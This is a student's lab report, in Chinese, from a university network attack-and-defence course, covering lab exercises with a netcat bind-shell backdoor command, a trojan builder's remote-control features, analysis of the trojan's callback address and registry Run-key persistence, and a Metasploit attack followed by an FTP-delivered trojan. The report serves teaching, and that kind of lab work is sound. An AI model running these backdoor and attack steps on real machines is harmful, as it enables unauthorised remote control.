网络对抗实验报告四_卿易

中国人民公安大学 网络对抗技术 实验报告四

网络侦查与网络扫描

学 号： 201720410020

区 队： 18网络实验班

实验任务

1．通过对木马的练习，使读者理解和掌握木马传播和运行的机制；通过手动删除木马，掌握检查木马和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。

2．了解并熟悉常用的网络攻击工具，木马的基本功能；

3．达到巩固课程知识和实际应用的目的。

---

---

任务一 利用NC控制电脑

熟悉NetCat（简称nc，具有网络军刀之称，它小巧精悍且功能强大，说它小巧精悍，是因为他的软件大小现在已经压缩到只有十几KB，而且在功能上丝毫不减；实验过程需要两个同学相互配合完成）：

将nc.exe拷贝到受害者的机器 （同学A）上，执行："nc.exe -l -p 2222 -e cmd.exe"留下后门，监听2222端口：

攻击者（同学B）使用nc进行连接，即执行命令"nc.exe 192.168.31.137 2222"，发现得到shell，可以执行dir命令：

攻击者添加用户"nc1"，密码为"nc1"：

在受害者机器上查看发现"nc1"用户添加成功：

任务二 利用木马控制电脑

利用g0host生成木马发送给受害者实现电脑控制

使用“不安装运行”方法生成木马服务端：

受害者运行后，与攻击者建立网络连接，并且能够实现屏幕记录、文件管理、键盘记录、会话管理等功能，即获取了受害者主机管理员权限：

实现文件管理功能：

实现屏幕记录功能：

实现键盘记录功能：

会话管理进行重启之后，自启动失败（未发现server.exe进程）

任务三 木马分析

将任务二中生成的木马设置具备自删除功能和自启动功能，对其进行分析。回答以下问题（截图证明）

---

---

1.该木马的回连IP是？

通过查看“火绒剑”查看主机网络连接情况，发现木马建立的网络连接，得知攻击者ip：192.168.8.129

2.该木马的回连端口是？

由上一问知回连端口是2012。

3.该木马自删除后，会将自身的宿主程序改成什么名字，并隐藏到系统其它目录中？

在受害者机器上运行“火绒剑”捕获进程，然后运行木马。并且以木马程序进程的pid和有害行为作为过滤器：

如下结果显示木马进行了自删除和注册表修改实现自启动：

跳转到自删除的具体位置，开放所有行为，发现木马创建了“C:\Windows\7CB6F956\svchsot.exe”程序并且运行了，同时删除了自己，怀疑"svchsot.exe"为木马自删除后的宿主程序：

右键查看任务组信息，发现修改的注册表是开机启动相关的：

去“火绒剑”启动项一栏里查看，发现未知程序修改了开机启动项，其路径为“C:\Windows\7CB6F956\svchsot.exe”，确定该木马自删除后，会将自身的宿主程序改成"svchsot.exe"：

4.该木马依靠什么方法实现自启动的，怎么实现的？

由上一问知，是通过修改"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"这一注册表项，添加木马"svchsot.exe"文件路径，实现开机自动启动。

任务四 msf攻击体验

1.在主机A上搭建easyfile,安装文件为efssetup，请见在线学习平台。

2.在主机B上安装metasploitframework，并在安装目录中启动/bin下的msfconsole

3.进入msf命令行后使用search命令查找相关模块，use 加载模块，show options 查看参数。

4.把远程目标参数rhosts设置为被攻击者的IP地址,开始攻击。

5.进入到meterpreter> 命令行下，说明已经获取到shell，使用sysinfo查看目标系统的信息，screenshot截屏。

6.下面的步骤是进一步控制目标机器，上传木马。

攻击者主机上搭建ftp服务器，生成木马服务端放在桌面：

msf的console里执行shell命令获取shell然后连接刚刚搭建的ftp服务器，并且下载木马：

被攻击机上查看发现下载成功：

msf远程shell执行上述木马，立刻就与攻击者主机连上了：